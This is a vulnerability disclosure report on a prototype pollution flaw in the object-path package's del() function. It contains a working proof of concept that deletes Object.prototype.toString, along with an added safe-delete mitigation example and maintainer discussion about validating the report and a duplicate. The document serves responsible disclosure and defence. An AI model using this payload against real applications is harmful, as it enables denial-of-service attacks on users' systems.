Prototype Pollution in mariocasciaro/object-path
Reported on Sep 13th 2021
Description
The object-path package is vulnerable to Prototype Pollution. The del() function fails to validate which Object properties it deletes. This allows attackers to modify the prototype of Object, causing the modification of default properties like toString on all objects.
Proof of Concept
Create the following PoC file:
```javascript
// PoC.js
const objectPath = require('object-path');
console.log("Before : " + ({}).toString());
objectPath.withInheritedProps.del({}, '__proto__.toString');
console.log("After : " + ({}).toString());
```
Execute the following commands in the terminal:
```shell
npm i object-path # Install affected module
node PoC.js # Run the PoC
```
Check the Output:
```text
Before : [object Object]
console.log("After : " + ({}).toString());
                              ^
TypeError: {}.toString is not a function
```
Impact
Affected versions of this package are vulnerable to Denial of Service (DoS) via the del function.
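The fix the description implies is to refuse any path segment that reaches the prototype chain before deleting. The following is an added example written for this report, not object-path's own code; the names safeDel and isForbiddenKey are assumed for the example.

```javascript
// Added example (not object-path's code): a path-based delete that refuses to
// walk into prototype-chain keys, so '__proto__.toString' can never reach
// Object.prototype. Names safeDel/isForbiddenKey are this example's own.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isForbiddenKey(key) {
  return FORBIDDEN_KEYS.has(key);
}

// Deletes obj[seg1][seg2]... walking only own properties.
// Returns true if the final key existed and was removed, false if the path
// did not resolve; throws on any forbidden segment anywhere in the path.
function safeDel(obj, path) {
  const segments = Array.isArray(path) ? path : String(path).split('.');
  if (segments.length === 0) return false;
  for (const seg of segments) {
    if (isForbiddenKey(seg)) {
      throw new Error(`refusing to traverse prototype key: ${seg}`);
    }
  }
  let current = obj;
  for (let i = 0; i < segments.length - 1; i++) {
    const seg = segments[i];
    // Call hasOwnProperty via Object.prototype so a shadowed or missing
    // hasOwnProperty on the target cannot defeat the check.
    if (!Object.prototype.hasOwnProperty.call(current, seg)) return false;
    current = current[seg];
    if (current === null || typeof current !== 'object') return false;
  }
  const last = segments[segments.length - 1];
  if (!Object.prototype.hasOwnProperty.call(current, last)) return false;
  return delete current[last];
}

// Shows the PoC path being rejected while an ordinary delete still works.
function demo() {
  const data = { user: { name: 'alice', token: 'secret' } }; // constructed input
  const removedToken = safeDel(data, 'user.token');
  let rejected = false;
  try {
    safeDel({}, '__proto__.toString');
  } catch (e) {
    rejected = true;
  }
  // Object.prototype.toString must survive the attempt.
  const toStringIntact = ({}).toString() === '[object Object]';
  return { removedToken, tokenGone: !('token' in data.user), rejected, toStringIntact };
}
```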
@admin please see the comment in https://github.com/mariocasciaro/object-path/issues/113
@mariocasciaro Can you please validate this report?
Use the "mark as valid" button to confirm this issue and confirm a fix when a fix is merged. Thank you.
@mariocasciaro - if you believe reports to be duplicate, feel free to mark them as invalid.
@admin They were both opened on the same day, which one should I mark as invalid?
This report was opened first, and so it would only be fair to reward this disclosure if the other is considered a duplicate.
I would recommend marking the other report as invalid and providing the reason as duplicate.
OK, thanks for the help. As a possible improvement to the platform, it would be nice to also see the time when the disclosure was opened, not just the date.
@mariocasciaro - thanks for the request - we can sort this out for you!
Yes, it has already been assigned and will be published shortly!